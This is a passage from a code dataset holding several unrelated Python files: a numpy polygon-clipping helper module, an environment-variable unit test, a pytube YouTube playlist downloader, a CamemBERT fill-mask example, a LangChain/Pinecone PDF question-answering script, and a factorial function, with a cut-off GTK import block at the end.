tmp[1:]\r\n # wh_ = np.nonzero(mask)[0]\r\n # sub_arrays = np.array_split(arr, wh_[wh_ > 0])\r\n tmp = arr[mask]  # -- slice the original array sequentially unique points\r\n if poly:  # -- polygon source check\r\n if (tmp[0] != tmp[-1]).all(-1):\r\n arr = np.concatenate((tmp, tmp[0, None]), axis=0)\r\n return arr\r\n return tmp\r\n\r\n\r\ndef _roll_(arrs):\r\n \"\"\"Roll point coordinates to a new starting position.\r\n\r\n Parameters\r\n ----------\r\n arrs : list of Geo arrays or ndarrays. 
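Typically the geometry being acted upon and the one used to overlay it, in that order (see `prep_overlay`). 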
Two arrays are expected.\r\n\r\n Notes\r\n -----\r\n Rolls the coordinates of the Geo array or ndarray to put the start/end\r\n points as close to the lower-left of the ring extent as possible.\r\n\r\n If a single array is passed, a single array is returned otherwise a list\r\n of arrays.\r\n \"\"\"\r\n # --\r\n if not isinstance(arrs, (list, tuple)):\r\n arrs = [arrs]\r\n out = []\r\n for ar in arrs:\r\n chk = npg.is_Geo(ar)\r\n if chk:\r\n out.append(npg.roll_coords(ar))\r\n else:\r\n out.append(roll_arrays(ar))\r\n return out\r\n\r\n\r\n# ---- (2) prepare for boolean operations\r\n#\r\ndef _w_(a, b, all_info):\r\n \"\"\"Return winding number and other values.\"\"\"\r\n x0, y0 = a[:-1].T # point `from` coordinates\r\n # x1, y1 = a[1:].T # point `to` coordinates\r\n x1_x0, y1_y0 = (a[1:] - a[:-1]).T\r\n #\r\n x2, y2 = b[:-1].T # clip polygon `from` coordinates\r\n x3, y3 = b[1:].T # clip polygon `to` coordinates\r\n x3_x2, y3_y2 = (b[1:] - b[:-1]).T\r\n # reshape poly deltas\r\n x3_x2 = x3_x2[:, None]\r\n y3_y2 = y3_y2[:, None]\r\n # deltas between pnts/poly x and y\r\n x0_x2 = x0 - x2[:, None]\r\n y0_y2 = y0 - y2[:, None]\r\n #\r\n a_0 = y0_y2 * x3_x2\r\n a_1 = y3_y2 * x0_x2\r\n b_0 = y0_y2 * x1_x0\r\n b_1 = y1_y0 * x0_x2\r\n #\r\n a_num = (a_0 - a_1) + 0.0 # signed distance diff_ in npg.pip.wn_np\r\n b_num = (b_0 - b_1) + 0.0\r\n #\r\n # pnts in poly\r\n chk1 = (y0_y2 >= 0.0) # y above poly's first y value, per segment\r\n chk2 = np.less(y0, y3[:, None]) # y above the poly's second point\r\n chk3 = np.sign(a_num).astype(np.int32)\r\n pos = (chk1 & chk2 & (chk3 > 0)).sum(axis=0, dtype=np.int32)\r\n neg = (~chk1 & ~chk2 & (chk3 < 0)).sum(axis=0, dtype=np.int32)\r\n wn_vals = pos - neg\r\n wn_ = np.concatenate((wn_vals, np.array([wn_vals[0]])))\r\n #\r\n if all_info: # denom of determinant\r\n denom = (x1_x0 * y3_y2) - (y1_y0 * x3_x2) + 0.0\r\n return wn_, denom, x0, y0, x1_x0, y1_y0, a_num, b_num\r\n return wn_\r\n\r\n\r\ndef _wn_clip_(pnts, poly, all_info=True):\r\n \"\"\"Return points in a polygon or on its perimeter, using `winding number`.\r\n\r\n Information required to determine intersection points is also provided.\r\n These data are used for clipping the polygon represented by `pnts` by the\r\n clipping polygon `poly`.\r\n\r\n Parameters\r\n ----------\r\n pnts, poly : array_like\r\n Geometries represent the points and polygons. `pnts` is assumed to be\r\n the polygon being clipped and `poly` is the clipping polygon.\r\n all_info : boolean\r\n True, returns points in polygons, the in and out id values, the\r\n crossing type and winding number. False, simply returns the winding\r\n number, with 0 being outside points and -1 being inside points for a\r\n clockwise-oriented polygon.\r\n\r\n Notes\r\n -----\r\n Negative and positive zero np.NZERO, np.PZERO == 0.0.\r\n `The denominator of this expression is the (squared) distance between\r\n P1 and P2. 
The numerator is twice the area of the triangle with its\r\n vertices at the three points, (x0, y0), p1 and p2.` Wikipedia\r\n With p1, p2 defining a line and x0,y0 a point.\r\n\r\n Other\r\n -----\r\n z = np.asarray(np.nonzero(npg.eucl_dist(a, b) == 0.)).T\r\n a[z[:, 0]] and b[z[:, 1]] return the points from both arrays that have a\r\n distance of 0.0 and they intersect.\r\n \"\"\"\r\n\r\n def _xsect_(a_num, b_num, denom, x1_x0, y1_y0, x0, y0):\r\n \"\"\"Return the intersections and their id values.\"\"\"\r\n with np.errstate(all=\"ignore\"): # ignore all errors\r\n u_a = (a_num / denom) + 0.0\r\n u_b = (b_num / denom) + 0.0\r\n z0 = np.logical_and(u_a >= 0., u_a <= 1.) # np.isfinite(u_a)`\r\n z1 = np.logical_and(u_b >= 0., u_b <= 1.) # np.isfinite(u_b)\r\n both = (z0 & z1)\r\n xs = (u_a * x1_x0 + x0)[both]\r\n ys = (u_a * y1_y0 + y0)[both]\r\n x_pnts = []\r\n if xs.size > 0:\r\n x_pnts = np.concatenate((xs[:, None], ys[:, None]), axis=1)\r\n whr = np.array(np.nonzero(both)).T\r\n return whr, x_pnts\r\n # --\r\n # Use `_w_` and `_xsect_` to determine pnts in poly\r\n wn_, denom, x0, y0, x1_x0, y1_y0, a_num, b_num = _w_(pnts, poly, True)\r\n whr, x_pnts = _xsect_(a_num, b_num, denom, x1_x0, y1_y0, x0, y0)\r\n p_in_c = np.nonzero(wn_)[0]\r\n # p_out_c = np.nonzero(wn_ + 1)[0]\r\n x_type = np.concatenate((wn_[:-1, None], wn_[1:, None]), axis=1)\r\n # --\r\n # Use `_w_` and `_xsect_` to determine poly pnts in pnts (as polygon)\r\n wn2_ = _w_(poly, pnts, False)\r\n c_in_p = np.nonzero(wn2_)[0]\r\n # c_out_p = np.nonzero(wn2_ + 1)[0]\r\n vals = [x_pnts, p_in_c, c_in_p, x_type, whr]\r\n # if ..outs needed [x_pnts, p_in_c, c_in_p, c_out_p, ...wn_, whr]\r\n if all_info:\r\n return vals\r\n return whr # wn_\r\n\r\n\r\ndef _node_type_(p_in_c, c_in_p, poly, clp, x_pnts):\r\n \"\"\"Return node intersection data. clipper polygon intersection`.\r\n\r\n Parameters\r\n ----------\r\n p_in_c, c_in_p : lists\r\n Id values of points in poly and clipper respectively.\r\n clp, poly : array_like\r\n The geometry of the clipper and the polygon being clipped.\r\n x_pnts : array_like\r\n The intersection points of the geometry edges.\r\n\r\n Returns\r\n -------\r\n - p_in_c : polygon points in clipper and reverse\r\n - c_in_p : clipper points in polygon and those that are equal\r\n - c_eq_p, p_eq_c : clipper/polygon equality\r\n - c_eq_x, p_eq_x : intersection points equality checks for both geometries\r\n - cp_eq, cx_eq, px_eq : clipper, polygon and intersection equivalents\r\n\r\n Notes\r\n -----\r\n Forming a dictionary for cp_eq, cs_eq, px_eq::\r\n\r\n kys = uniq_1d(px_eq[:, 0]).tolist() # [ 0, 2, 3, 4, 12]\r\n dc = {} # -- dictionary\r\n dc[0] = px_eq[px_eq[:, 0] == 0][:,1].tolist()\r\n for k in kys:\r\n dc[k] = px_eq[px_eq[:, 0] == k][:,1].tolist()\r\n dc\r\n {0: [0, 3, 13, 14],\r\n 2: [7, 8],\r\n 3: [9, 10, 11],\r\n 4: [1, 2, 5, 6],\r\n 12: [0, 3, 13, 14]}\r\n\r\n Or, you can split the array::\r\n\r\n whr = np.nonzero(np.diff(cx_eq[:, 0]))[0] + 1\r\n np.array_split(cx_eq, whr)\r\n [array([[ 0, 0],\r\n [ 0, 3],\r\n [ 0, 13],\r\n [ 0, 14]], dtype=int64),\r\n array([[1, 1],\r\n [1, 2],\r\n [1, 5],\r\n [1, 6]], dtype=int64),\r\n array([[2, 4]], dtype=int64),\r\n array([[3, 7],\r\n [3, 8]], dtype=int64),\r\n array([[ 4, 9],\r\n [ 4, 10],\r\n [ 4, 11]], dtype=int64),\r\n array([[ 6, 0],\r\n [ 6, 3],\r\n [ 6, 13],\r\n [ 6, 14]], dtype=int64)]\r\n\r\n # -- Point equality check. 
-- c_eq_p, c_eq_x, p_eq_c, p_eq_x\r\n # poly[p_eq_c], poly[p_eq_x] and clp[c_eq_p], clp[c_eq_x]\r\n \"\"\"\r\n # -- defaults\r\n px_in_c = []\r\n cx_in_p = []\r\n # -- checks\r\n # poly/clp, poly/x_pnts, clp/x_pnts equalities\r\n c_eq_p, p_eq_c = np.nonzero((poly == clp[:, None]).all(-1))\r\n p_eq_x, _ = np.nonzero((x_pnts == poly[:, None]).all(-1))\r\n c_eq_x, _ = np.nonzero((x_pnts == clp[:, None]).all(-1))\r\n # -- check equality\r\n c_eq_p = sorted(list(set(c_eq_p))) if len(c_eq_p) > 0 else []\r\n p_eq_c = sorted(list(set(p_eq_c))) if len(p_eq_c) > 0 else []\r\n p_eq_x = sorted(list(set(p_eq_x))) if len(p_eq_x) > 0 else []\r\n c_eq_x = sorted(list(set(c_eq_x))) if len(c_eq_x) > 0 else []\r\n # -- build the output\r\n p_in_c = list(set(p_in_c))\r\n c_in_p = list(set(c_in_p))\r\n if p_eq_c or p_eq_x:  # -- non-empty lists check\r\n # p_in_c = reduce(np.union1d, [p_in_c, p_eq_c, p_eq_x])  # slow equiv.\r\n px_in_c = sorted(list(set(p_in_c + p_eq_c + p_eq_x)))\r\n if c_eq_p or c_eq_x:  # c_in_p + (p_eq_c, c_eq_x)\r\n cx_in_p = sorted(list(set(c_in_p + c_eq_p + c_eq_x)))\r\n return px_in_c, p_in_c, p_eq_c, p_eq_x, cx_in_p, c_in_p, c_eq_p, c_eq_x\r\n\r\n\r\ndef prep_overlay(arrs, roll=True, polygons=[True, True]):\r\n \"\"\"Prepare arrays for overlay analysis.\r\n\r\n Parameters\r\n ----------\r\n arrs : list/tuple\r\n The first geometry is the one being acted upon and the second is the\r\n one being used to overlay the first for operations such as clipping,\r\n splitting, intersection.\r\n polygons : list/tuple\r\n True, the input geometry is a polygon, False otherwise.\r\n Some operations permit polygon and polyline inputs, so you can alter\r\n `polygons=[True, False]` if the first is a polygon and the second a\r\n polyline.\r\n\r\n Requires\r\n --------\r\n This script compiles the common functions::\r\n\r\n - `roll_arrays` (optional)\r\n - `_wn_clip_`\r\n - `_node_type_`\r\n - `_add_pnts_`\r\n - `_del_seq_pnts_`\r\n\r\n Returns\r\n -------\r\n The following are returned::\r\n\r\n - x_pnts : intersection points\r\n - a0, a1 : arrays rolled to first intersection,\r\n - a0_new, a1_new : rolled with intersections added on,\r\n - args : optional arguments\r\n - px_in_c, cx_in_p : poly/intersection in c and clip/intersection in p\r\n - p_in_c, c_in_p : poly in clip, clip in poly\r\n - c_eq_p, c_eq_x : clip equals poly or intersection\r\n - p_eq_c, p_eq_x : poly equals clip or intersection\r\n\r\n Notes\r\n -----\r\n The sequence is as follows::\r\n\r\n - Roll the arrays so that their first coordinate is the closest\r\n to the lower left of the geometry extent.\r\n - Determine points inside each other's geometry.\r\n - Classify the points.\r\n - Add intersection points to both geometries.\r\n - Delete sequential duplicates if any exist.\r\n \"\"\"\r\n #\r\n # -- roll towards LL. 
`_wn_clp_` gets pnts inside, on, outside each other\r\n if len(arrs) != 2:\r\n print(\"Two poly* type geometries expected.\")\r\n # return None\r\n a0, a1 = arrs\r\n is_0, is_1 = polygons\r\n if roll:\r\n a0, a1 = _roll_(arrs)\r\n vals = _wn_clip_(a0, a1, all_info=True)\r\n x_pnts, pInc, cInp, x_type, whr = vals\r\n args = _node_type_(pInc, cInp, a0, a1, x_pnts)\r\n # px_in_c, cx_in_p, p_in_c, c_in_p, c_eq_p, c_eq_x, p_eq_c, p_eq_x = args\r\n a0_new, a1_new = _add_pnts_(a0, a1, x_pnts, whr)\r\n x_pnts = _del_seq_pnts_(x_pnts, poly=False)\r\n a0_new = _del_seq_pnts_(np.concatenate((a0_new), axis=0), poly=is_0)\r\n a1_new = _del_seq_pnts_(np.concatenate((a1_new), axis=0), poly=is_1)\r\n return x_pnts, a0, a1, a0_new, a1_new, args\r\n\r\n\r\n# ---- (3) add intersection points\r\n#\r\ndef add_intersections(\r\n p0, p1, roll_to_minX=True, polygons=[True, True], class_ids=True):\r\n \"\"\"Return input polygons with intersections points added.\r\n\r\n Parameters\r\n ----------\r\n p0, p1 : array_like\r\n The overlapping poly features.\r\n polygons : list/tuple\r\n True, the input geometry is a polygon feature, False, for polyline.\r\n Some operations permit polygon and polyline inputs, so you can alter\r\n `polygons=[True, False]` if the first is a polygon and the second a\r\n polyline.\r\n roll_to_minX : boolean\r\n Select the intersection point with the minimum x-value. This is used\r\n to roll the arrays.\r\n class_id : boolean\r\n Return Pout, Pin, Cout, Cin if True. These are the indices of the\r\n points that are in or out of their respective counterpart.\r\n\r\n Requires\r\n --------\r\n `_add_pnts_`, `_del_seq_pnts_`, `_w_`, `_wn_clip_`\r\n _add_pnts_(p0, p1, x_pnts, whr)\r\n\r\n Returns\r\n -------\r\n The poly features rotated to the first intersection point (`p0_n, p1_n`),\r\n their respective indices from the start (`id_01`) and the intersection\r\n points (`x_pnts`), and the classified indices for each polygon as to\r\n whether the points are outside, on or inside the other\r\n\r\n p0_n, p1_n : arrays\r\n The input arrays, rotated to their first intersection point and those\r\n points added to their perimeter.\r\n\r\n x_pnts : array\r\n The intersection points with sequential duplicates removed.\r\n\r\n id_plcl : array\r\n Where the polygons intersect with p0, p1 representing the ids in their\r\n respective column. By convention, `poly` and `clip` is the order of\r\n the indices (eg. 
`plcl`).\r\n\r\n p0_ioo, p1_ioo : arrays\r\n Poly id values and whether the point is outside the other (-1), an\r\n intersection point on the boundary (0) or inside the other polygon (1).\r\n\r\n Example\r\n -------\r\n Outside and inside ids are determined using `in_out_on`.\r\n Using `E` and `d0_` as `p0_` and `p1_`::\r\n\r\n w0 = np.nonzero(p0_ioo[:, 1] <= 0)[0] # outside and on\r\n Pout = p0_n[w0]\r\n w1 = np.nonzero(p1_ioo[:, 1] >= 0)[0] # inside and on\r\n Pin = p1_n[w1]\r\n z0_id, z1_id = np.nonzero((z0 == z1[:, None]).all(-1))\r\n id_s10 = np.concatenate((z0_id[:, None], z1_id[:, None]), axis=1) # or\r\n id_s01 = np.concatenate((z1_id[:, None], z0_id[:, None]), axis=1)\r\n id_s01srt = id_s01[np.argsort(id_s01[:, 0])]\r\n plot_polygons([z0, z1])\r\n \"\"\"\r\n def _classify_(p0_, p1_, id_):\r\n \"\"\"Return poly points classified as inside, on or outside.\"\"\"\r\n p_ids = np.arange(0, p0_.shape[0])\r\n p_neq = sorted(list(set(p_ids).difference(set(id_))))\r\n p_neq = np.array(p_neq) # convert to array\r\n z = p0_[p_neq] # check the points not on, but may be in or out\r\n p_w = _w_(z, p1_, False) # use _w_ from _wn_clip_\r\n p_i = np.nonzero(p_w)[0]\r\n p_o = np.nonzero(p_w + 1)[0]\r\n p_in = p_neq[p_i] # in ids\r\n p_out = p_neq[p_o] # out ids\r\n p_ioo = np.zeros(p0_.shape, dtype='int') # create the output indices\r\n p_ioo[:, 0] = p_ids # p0 ids (i)n (o)ut (o)n -> ``ioo``\r\n p_ioo[p_in, 1] = 1\r\n p_ioo[p_out, 1] = -1\r\n return p_ioo\r\n\r\n def in_out_on(w0, p_sze):\r\n \"\"\"Return the array indices as lists.\"\"\"\r\n if w0.size == 0:\r\n # print(\"Empty array.\")\r\n return []\r\n elif len(w0) == 1: # 2023-05-07\r\n val = w0.tolist()[0]\r\n vals = [val - 1, val, val + 1] if val > 0 else [val, val + 1]\r\n return vals\r\n out = []\r\n sub = [w0[0] - 1, w0[0]]\r\n for cnt, i in enumerate(w0[1:], 0):\r\n prev = w0[cnt]\r\n if i - prev == 1:\r\n sub.append(i)\r\n else:\r\n sub.append(prev + 1)\r\n out.append(sub)\r\n sub = [i - 1, i]\r\n if cnt == len(w0) - 2:\r\n if len(sub) >= 2 and p_sze not in sub:\r\n add_ = min(p_sze, i + 1)\r\n sub.append(add_)\r\n out.append(sub)\r\n return out\r\n # --\r\n #\r\n is_0, is_1 = polygons\r\n vals = _wn_clip_(p0, p1, all_info=True)\r\n x_pnts, pInc, cInp, x_type, whr = vals\r\n p0_n, p1_n = _add_pnts_(p0, p1, x_pnts, whr)\r\n p0_n = _del_seq_pnts_(np.concatenate((p0_n), axis=0), poly=is_0)\r\n p1_n = _del_seq_pnts_(np.concatenate((p1_n), axis=0), poly=is_1)\r\n x_pnts = _del_seq_pnts_(x_pnts, False) # True, if wanting a polygon\r\n # -- locate the roll coordinates\r\n if roll_to_minX:\r\n w = np.argsort(x_pnts[:, 0])[0] # sort and slice is quickest\r\n xp = x_pnts[w]\r\n else:\r\n xp = x_pnts\r\n r0 = np.nonzero((xp == p0_n[:, None]).all(-1).any(-1))[0]\r\n r1 = np.nonzero((xp == p1_n[:, None]).all(-1).any(-1))[0]\r\n v0, v1 = r0[0], r1[0]\r\n p0_n = np.concatenate((p0_n[v0:-1], p0_n[:v0], [p0_n[v0]]), axis=0)\r\n p1_n = np.concatenate((p1_n[v1:-1], p1_n[:v1], [p1_n[v1]]), axis=0)\r\n # -- fix the id pairing\r\n p0N = len(p0_n) - 1\r\n p1N = len(p1_n) - 1\r\n id0, id1 = np.nonzero((p1_n == p0_n[:, None]).all(-1))\r\n whr0 = np.nonzero(id0 == p0N)[0]\r\n whr1 = np.nonzero(id1 == p1N)[0]\r\n id0[whr0] = 0\r\n id1[whr1] = 0 # slice off the first and last\r\n id_plcl = np.concatenate((id0[:, None], id1[:, None]), axis=1)[1:-1]\r\n id_plcl[-1] = [p0N, p1N] # make sure the last entry is < shape[0]\r\n #\r\n if class_ids:\r\n p0_ioo = _classify_(p0_n, p1_n, id0) # poly\r\n p1_ioo = _classify_(p1_n, p0_n, id1) # clipper\r\n w0 = p0_ioo[p0_ioo[:, 1] 
< 0, 0]  # slice where p0_ioo < 0\r\n        w1 = p0_ioo[p0_ioo[:, 1] > 0, 0]  # slice where p0_ioo > 0\r\n        w2 = p1_ioo[p1_ioo[:, 1] < 0, 0]  # slice where p1_ioo < 0\r\n        w3 = p1_ioo[p1_ioo[:, 1] > 0, 0]  # slice where p1_ioo > 0\r\n        p0_sze = p0_n.shape[0] - 1\r\n        p1_sze = p1_n.shape[0] - 1\r\n        Pout = in_out_on(w0, p0_sze)  # poly outside clip\r\n        Pin = in_out_on(w1, p0_sze)  # poly inside clip\r\n        Cout = in_out_on(w2, p1_sze)  # clip outside poly\r\n        Cin = in_out_on(w3, p1_sze)  # clip inside poly\r\n        # -- NOTE\r\n        # -- id_plcl are the poly, clp point ids equal to x_pnts\r\n        return p0_n, p1_n, id_plcl, x_pnts, Pout, Pin, Cout, Cin\r\n    return p0_n, p1_n, id_plcl, x_pnts  # p0_ioo, p1_ioo\r\n\r\n\r\n# ---- (4) extras\r\n#\r\ndef prePC(i0_, i1_, cN, j0_, j1_, pN, pinside, cinside):\r\n    \"\"\"Determine pre `p` and `c` points.\"\"\"\r\n    preP, preC = [], []\r\n    i1_ = 0 if i1_ == cN else i1_  # clp first/last point check\r\n    j1_ = 0 if j1_ == pN else j1_  # poly first/last point check\r\n    #\r\n    # -- add preceding pinside points\r\n    if j0_ > 0 and j1_ < j0_:\r\n        preP = [m for m in range(j1_, j0_ + 1) if m in pinside]\r\n    # -- add preceding cinside points\r\n    if i0_ > 0 and i1_ < i0_:\r\n        preC = [m for m in range(i1_, i0_ + 1) if m in cinside]\r\n    return preP, preC\r\n\r\n\r\ndef postPC(inC_0, cN, inP_0, pN, cinside, pinside):\r\n    \"\"\"Determine post `p` and `c` points.\"\"\"\r\n    preC, preP = [], []\r\n    # -- add trailing cinside points\r\n    if inC_0 != 0:\r\n        preC = [m for m in range(inC_0, cN + 1) if m in cinside]\r\n    # -- add trailing pinside points\r\n    if inP_0 != 0:\r\n        preP = [m for m in range(inP_0, pN + 1) if m in pinside]\r\n    return preC, preP\r\n\r\n\r\n# ---- Final main section ----------------------------------------------------\r\nif __name__ == \"__main__\":\r\n    \"\"\"optional location for parameters\"\"\"\r\n    print(f\"\\nRunning... 
{script}\\n\")\r\n","repo_name":"Dan-Patterson/numpy_geometry","sub_path":"arcpro_npg/npg/npg/npg_bool_hlp.py","file_name":"npg_bool_hlp.py","file_ext":"py","file_size_in_byte":23057,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"}
+{"seq_id":"3907004730","text":"import unittest\nfrom modules.utils import *\n\n\nclass TestStringMethods(unittest.TestCase):\n\n    def test_get_env_or_default_returns_default_value_for_nonexisting_env(self):\n        default = \"DEFAULT\"\n        result = get_env_or_default(\"this env var does not exist\", \"DEFAULT\")\n        self.assertEqual(result, default)\n\n    def test_get_env_or_default_returns_env_var(self):\n        default = \"DEFAULT\"\n        expected = \"EXPECTED_CONTENT\"\n        var_name = \"VARNAME_FOR_TEST\"\n        os.environ[var_name] = expected\n        result = get_env_or_default(var_name, default)\n        self.assertEqual(expected, result)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"danielpaulus/python_restapi_with_flask","sub_path":"modules/utils/test_env.py","file_name":"test_env.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"40749290457","text":"# Importing libraries\n# Program to download a complete\n# YouTube playlist\n\n# To avoid build errors you need:\n#pip uninstall PyQt5\n#pip uninstall PyQt5-sip\n#pip uninstall PyQtWebEngine\n\n\nimport bs4 as bs\nimport sys\nimport threading\nimport time\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import QUrl\nimport pytube\n\ndown = 0\ndesc = 0\nclass Page(QWebEnginePage):\n    def __init__(self, url):\n        self.app = QApplication(sys.argv)\n        QWebEnginePage.__init__(self)\n        self.html = ''\n        self.loadFinished.connect(self._on_load_finished)\n        self.load(QUrl(url))\n        self.app.exec_()\n\n    def _on_load_finished(self):\n        self.html = self.toHtml(self.Callable)\n        print('Connected :3')\n\n    def Callable(self, html_str):\n        self.html = html_str\n        self.app.quit()\n\n\nlinks = []\n\n\ndef exact_link(link):\n    vid_id = link.split('=')\n    # print(vid_id)\n    parts = \"\"  # renamed so the builtin ``str`` is not shadowed\n    for i in vid_id[0:2]:\n        parts += i + \"=\"\n\n    str_new = parts[0:len(parts) - 1]\n    index = str_new.find(\"&\")\n\n    new_link = \"https://www.youtube.com\" + str_new[0:index]\n    return new_link\n\ndef DownHilos(link):\n    global down  # shared counter of active downloads, updated from worker threads\n    down += 1\n    video = pytube.YouTube(link)\n    print(\"Downloading \" + video.title)\n    video.streams.filter(progressive=True, file_extension='mp4').order_by('resolution').desc().first().download()\n    down -= 1\n    return\n\nurl = input(\"Enter your playlist link plox :v\")\ndesc = int(input(\"Enter the number of simultaneous downloads\"))\n# Scraping and extracting the video\n# links from the given playlist url\npage = Page(url)\ncount = 0\n\nsoup = bs.BeautifulSoup(page.html, 'html.parser')\n\nfor link in soup.find_all('a', id='thumbnail'):\n    # not using first link because it is\n    # playlist link not particular video link\n    if count == 0:\n        count += 1\n        continue\n    else:\n        try:\n            vid_src = link['href']\n        except KeyError:\n            print(\"Finishing downloads....\")\n            continue\n        #print(vid_src)\n        # keeping the format of link to be\n        # given to pytube otherwise in some cases\n        new_link = exact_link(vid_src)\n        while down >= desc:\n            time.sleep(0.1)  # wait for a free slot instead of busy-spinning the CPU\n        threading.Thread(target=DownHilos,args=(new_link,)).start()\nprint(\"Thanks for flying with aereopinguino, have a nice day\")","repo_name":"ThunderGer23/ProgramasPythonQueSalvanVidas","sub_path":"DownloadPlayListYoutube.py","file_name":"DownloadPlayListYoutube.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27499827355","text":"import os\nimport pickle\nimport pinecone\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.llms import OpenAI\nfrom langchain.chains.question_answering import load_qa_chain\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nPINECONE_API_KEY = os.getenv('PINECONE_API_KEY')\nPINECONE_API_ENV = os.getenv('PINECONE_API_ENV')\n\n\ndef read_pdf_data(file_path):\n    loader = PyPDFLoader(file_path)\n    return loader.load()\n\n\ndef get_text_splits(data):\n    text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n    return text_splitter.split_documents(data)\n\n\ndef get_embeddings(api_key, local_file='embeddings.pkl'):\n    # Check if embeddings exist locally\n    if os.path.exists(local_file):\n        print(\"Loading embeddings from local file...\")\n        with open(local_file, 'rb') as f:\n            embeddings = pickle.load(f)\n    else:\n        embeddings = OpenAIEmbeddings(openai_api_key=api_key)\n        # Save embeddings to a local file\n        with open(local_file, 'wb') as f:\n            pickle.dump(embeddings, f)\n    return embeddings\n\n\ndef upload_to_pinecone(texts, embeddings, index_name):\n    pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_API_ENV)\n    return Pinecone.from_texts([t.page_content for t in texts], embeddings, index_name=index_name)\n\n\ndef search_documents(docsearch, query):\n    return docsearch.similarity_search(query)\n\n\ndef question_answering(llm, docs, prompt):\n    chain = load_qa_chain(llm, chain_type=\"stuff\")\n    return chain.run(input_documents=docs, question=prompt)\n\n\ndef main():\n    # Read data from PDF\n    data = read_pdf_data(\"./english_vachanamrut.pdf\")\n\n    # Get text splits\n    texts = get_text_splits(data)\n\n    # Generate embeddings\n    embeddings = get_embeddings(OPENAI_API_KEY)\n\n    # Upload to Pinecone\n    pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_API_ENV)\n    # pinecone.create_index(\"yogi\", dimension=1536, metric=\"cosine\")\n    # docsearch = upload_to_pinecone(texts, embeddings, \"yogi\")\n    docsearch = Pinecone.from_existing_index(\"yogi\", embeddings)\n\n    # Search documents\n    query = \"What are the three levels of vairagya?\"\n    docs = search_documents(docsearch, query)\n\n    # Question Answering\n    llm = OpenAI(temperature=0, openai_api_key=OPENAI_API_KEY)\n    answer = question_answering(llm, docs, query)\n\n    print(answer)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"darshan-hindocha/vachanamrut-study","sub_path":"data/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34365417511","text":"def factorial(num=12):\r\n    if (num < 0):\r\n        return None\r\n    elif (num == 0 or num == 1):\r\n        return 1\r\n    else:\r\n        fact = 1\r\n        for i in range(2, num + 1):\r\n            fact = fact * i\r\n        return 
fact\r\n","repo_name":"anjan111/Python","sub_path":"Rohith_Batch/module/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"15253056286","text":"from transformers import pipeline\n\ncamembert_fill_mask = pipeline(\"fill-mask\", model=\"camembert-base\")\nresults = camembert_fill_mask(\"Le camembert est <mask> :)\")\nprint(results)\n\n# [{'score': 0.49091100692749023, 'token': 7200, 'token_str': 'délicieux', 'sequence': 'Le camembert est délicieux :)'},\n# {'score': 0.10556945204734802, 'token': 2183, 'token_str': 'excellent', 'sequence': 'Le camembert est excellent :)'},\n# {'score': 0.03453319892287254, 'token': 26202, 'token_str': 'succulent', 'sequence': 'Le camembert est succulent :)'},\n# {'score': 0.03303125500679016, 'token': 528, 'token_str': 'meilleur', 'sequence': 'Le camembert est meilleur :)'},\n# {'score': 0.03007635846734047, 'token': 1654, 'token_str': 'parfait', 'sequence': 'Le camembert est parfait :)'}]\n'''\nfrom transformers import CamembertTokenizer, CamembertForMaskedLM\ntokenizer = CamembertTokenizer.from_pretrained(\"camembert-base\")\nmodel = CamembertForMaskedLM.from_pretrained(\"camembert-base\")\n'''\n\n# A better approach: use the Auto* classes\n\nfrom transformers import AutoTokenizer, AutoModelForMaskedLM\n\ntokenizer = AutoTokenizer.from_pretrained(\"camembert-base\")\nmodel = AutoModelForMaskedLM.from_pretrained(\"camembert-base\")","repo_name":"Will-learning-nlp/ITLS_homework","sub_path":"transformers_练习代码/11_使用预训练模型.py","file_name":"11_使用预训练模型.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3462853537","text":"import gi\ntry:\n    gi.require_version('Gtk', '3.0')\n    gi.require_version('Gdk', '3.0')\n    gi.require_version('Gio', '2.0')\n    gi.require_version('GLib', '2.0')\n    gi.require_version('GObject', '2.0')\n    gi.require_version('GdkPixbuf', '2.0')\n    gi.require_version('Notify', '0.7')\nexcept Exception as e:\n    print(e)\n    exit(1)\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import Gio\nfrom gi.repository import GLib\nfrom gi.repository import GObject\nfrom gi.repository import Notify\nimport os\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom mutagen.oggvorbis import OggVorbis\nfrom . 
